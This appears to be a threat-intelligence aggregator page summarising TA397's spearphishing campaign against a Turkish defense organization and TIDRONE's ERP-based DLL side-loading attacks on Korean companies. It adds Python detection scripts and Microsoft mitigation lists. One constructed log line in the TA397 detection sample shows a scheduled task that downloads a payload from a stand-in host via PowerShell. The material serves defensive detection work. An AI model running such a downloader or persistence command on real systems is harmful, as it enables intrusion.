Home - The article:
Source |
RiskIQ |
Identifier |
8627194 |
Publication date |
2024-12-18 18:56:30 (viewed: 2024-12-18 19:08:38) |
Title |
Hidden in Plain Sight: TA397's New Attack Chain Delivers Espionage RATs (Recycled) |
Text |
#### Targeted Geolocations
- Türkiye
#### Targeted Industries
- Defense Industrial Base
## Snapshot
Proofpoint recently observed TA397, an advanced persistent threat (APT) group also known as Bitter, targeting a Turkish defense organization using spearphishing emails. The campaign leveraged lures related to public infrastructure projects in Madagascar, containing RAR archives with NTFS alternate data streams (ADS). These ADS streams delivered a malicious shortcut (LNK) file, which executed PowerShell commands to create a scheduled task for downloading additional payloads.
## Description
In this attack, TA397 deployed two remote access trojans (RATs): WmRAT and MiyaRAT, both designed for intelligence gathering and data exfiltration. WmRAT is a C++-based backdoor capable of executing commands, capturing screenshots, determining geolocation data, and stealing system information. MiyaRAT, also written in C++, offers similar functionality.
According to Proofpoint, this attack aligns with TA397's established tactics, which include using RAR archives and scheduled tasks for persistence, targeting defense sector organizations in the EMEA and APAC regions, and leveraging RATs historically attributed to the group. Notably, MiyaRAT appears to be reserved for high-value targets, as evidenced by its limited use.
Proofpoint assesses that TA397's activities are likely intelligence-gathering efforts in support of a South Asian government. The group's consistent focus on the defense, energy, and engineering sectors in EMEA and APAC regions underscores its ability to adapt tools and techniques to target high-value entities effectively.
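The chain above (shortcut launched from Explorer, PowerShell creating a scheduled task whose action fetches a payload) can be surfaced from process-creation telemetry. The following detection is an added example written for this page, not Proofpoint's or Microsoft's code; the pipe-separated log format and the sample events are constructed for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

def parse_events(lines):
    """Parse constructed 'pid=..|ppid=..|image=..|cmd=..' lines (hypothetical format)."""
    events = []
    for line in lines:
        # Split at most 3 times so a command line containing '|' stays intact.
        fields = dict(part.split("=", 1) for part in line.strip().split("|", 3))
        events.append(ProcEvent(int(fields["pid"]), int(fields["ppid"]),
                                fields["image"].lower(), fields["cmd"]))
    return events

URL_RE = re.compile(r"https?://", re.IGNORECASE)

def find_lnk_task_chains(events):
    """Return pids of schtasks /create events whose ancestry is
    explorer.exe -> powershell.exe and whose task action embeds a URL."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if not e.image.endswith("schtasks.exe") or "/create" not in e.cmdline.lower():
            continue
        parent = by_pid.get(e.ppid)          # PowerShell launched by the shortcut
        if parent is None or not parent.image.endswith("powershell.exe"):
            continue
        grandparent = by_pid.get(parent.ppid)  # Explorer resolves the LNK target
        if grandparent is None or not grandparent.image.endswith("explorer.exe"):
            continue
        if URL_RE.search(e.cmdline):         # task action is a downloader
            hits.append(e.pid)
    return hits

# Constructed sample telemetry: one malicious chain (pid 300) and benign noise.
SAMPLE_LOG = r"""
pid=100|ppid=1|image=C:\Windows\explorer.exe|cmd=explorer.exe
pid=200|ppid=100|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -w hidden -c ...
pid=300|ppid=200|image=C:\Windows\System32\schtasks.exe|cmd=schtasks.exe /create /sc minute /mo 15 /tn Updater /tr "powershell -c iwr http://example.invalid/p"
pid=400|ppid=100|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -c Get-Date
pid=500|ppid=400|image=C:\Windows\System32\schtasks.exe|cmd=schtasks.exe /query
"""

def detect_sample():
    return find_lnk_task_chains(parse_events(SAMPLE_LOG.strip().splitlines()))

if __name__ == "__main__":
    print("suspicious schtasks pids:", detect_sample())
```

Real deployments would read Sysmon event 1 or Defender for Endpoint process events and may need to follow cmd.exe or conhost.exe hops between the shortcut and PowerShell.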
## Microsoft Analysis and Additional OSINT Context
TA397, also known as [Bitter and T-APT-17](https://attack.mitre.org/groups/G1002/), is a likely South Asian cyber espionage threat group, active since at least 2013. The [group's targets](https://blog.talosintelligence.com/bitter-apt-adds-bangladesh-to-their/) have included organizations within the energy, engineering, government, and military sectors of China, Bangladesh, Pakistan, and Saudi Arabia, among others. The group is primarily motivated by espionage and has been observed targeting both mobile and desktop platforms. TA397 has used a number of RATs including Bitter RAT, SlideRAT, AndroRAT, and Almond RAT in addition to WmRAT and MiyaRAT, mentioned above.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [ne |
Tags |
Ransomware
Malware
Tool
Threat
Mobile
Industrial
|
Reposts of the article (1):
Source |
RiskIQ |
Identifier |
8626791 |
Publication date |
2024-12-17 22:39:16 (viewed: 2024-12-17 23:08:46) |
Title |
Analysis on the Case of TIDRONE Threat Actor's Attacks on Korean Companies |
Text |
#### Targeted Geolocations
- Korea
## Snapshot
The AhnLab Security Intelligence Center (ASEC) has identified recent attacks by TIDRONE, a Chinese-speaking threat group that has been [previously observed attacking Taiwanese defense and drone manufacturing companies](https://security.microsoft.com/intel-explorer/articles/14a1a551).
## Description
In these attacks, ASEC has observed TIDRONE targeting organizations through the exploitation of Enterprise Resource Planning (ERP) software to distribute a backdoor called CLNTEND. The group uses DLL side-loading techniques to install backdoor malware, including CXCLNT and CLNTEND by exploiting ERP software and remote monitoring and management (RMM) tools like UltraVNC.
ASEC discovered that since the first half of 2024, Korean companies have been targeted with CLNTEND. The attacks often leverage small-scale, customized ERP solutions that lack official websites and have limited user bases. TIDRONE either replaces legitimate ERP versions with malware or combines ERP software with malicious droppers. Key executable files exploited include winword.exe, VsGraphicsDesktopEngine.exe, and rc.exe, which load the malicious DLL and execute the encrypted backdoor malware.
CLNTEND is a Remote Access Trojan (RAT) that supports multiple communication protocols, including TCP, TLS, HTTP, HTTPS, and SMB, making it versatile for covert operations. TIDRONE's loaders are highly obfuscated and use techniques like FlsCallback and Fiber structure overwriting to evade analysis. According to ASEC, the continued targeting of Korean companies underscores TIDRONE's expanded focus beyond Taiwan. By exploiting ERP vulnerabilities, particularly those developed by small firms, the group maintains a foothold for delivering its malware.
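The side-loading described above relies on a legitimately signed host executable (winword.exe, VsGraphicsDesktopEngine.exe or rc.exe) being run from an unusual directory next to a malicious DLL. The heuristic below, an added example not taken from ASEC or Microsoft, flags image-load events where one of those hosts loads a DLL from its own directory and that directory lies outside the usual install roots; the log format, the trusted-root list and the DLL names are assumptions constructed for the example.

```python
from pathlib import PureWindowsPath

# Host executables named in the ASEC report as abused for DLL side-loading.
SIDELOAD_HOSTS = {"winword.exe", "vsgraphicsdesktopengine.exe", "rc.exe"}

# Where a properly installed copy of those hosts normally lives (assumption; tune per estate).
TRUSTED_ROOTS = ("c:\\windows", "c:\\program files", "c:\\program files (x86)")

def is_trusted_dir(path):
    p = str(PureWindowsPath(path)).lower()
    return any(p.startswith(root) for root in TRUSTED_ROOTS)

def parse_loads(lines):
    """Parse constructed 'image=<exe path>|dll=<dll path>' image-load records."""
    out = []
    for line in lines:
        fields = dict(part.split("=", 1) for part in line.strip().split("|"))
        out.append((fields["image"], fields["dll"]))
    return out

def flag_sideloads(loads):
    """Return (exe, dll) pairs where a known side-load host, running from an
    untrusted directory, loads a DLL that sits in that same directory."""
    hits = []
    for image, dll in loads:
        exe, lib = PureWindowsPath(image), PureWindowsPath(dll)
        if exe.name.lower() not in SIDELOAD_HOSTS:
            continue
        same_dir = str(exe.parent).lower() == str(lib.parent).lower()
        if same_dir and not is_trusted_dir(exe.parent):
            hits.append((image, dll))
    return hits

# Constructed sample records: only the second one is a side-load candidate.
SAMPLE_LOADS = r"""
image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|dll=C:\Program Files\Microsoft Office\root\Office16\helper.dll
image=C:\Users\user\AppData\Local\Temp\erp\winword.exe|dll=C:\Users\user\AppData\Local\Temp\erp\helper.dll
image=C:\Users\user\Downloads\rc.exe|dll=C:\Windows\System32\kernel32.dll
image=C:\Users\user\Downloads\notepad.exe|dll=C:\Users\user\Downloads\x.dll
"""

def detect_sample():
    return flag_sideloads(parse_loads(SAMPLE_LOADS.strip().splitlines()))

if __name__ == "__main__":
    for exe, dll in detect_sample():
        print("possible side-load:", exe, "->", dll)
```

A legitimate portable copy of a host binary in a user directory would also trip this rule, so pair it with signature checks on the loaded DLL before alerting.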
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection.
## Detections/Hu |
Tags |
Malware
Tool
Vulnerability
Threat
|
The article does not appear to have been reposted from an earlier one.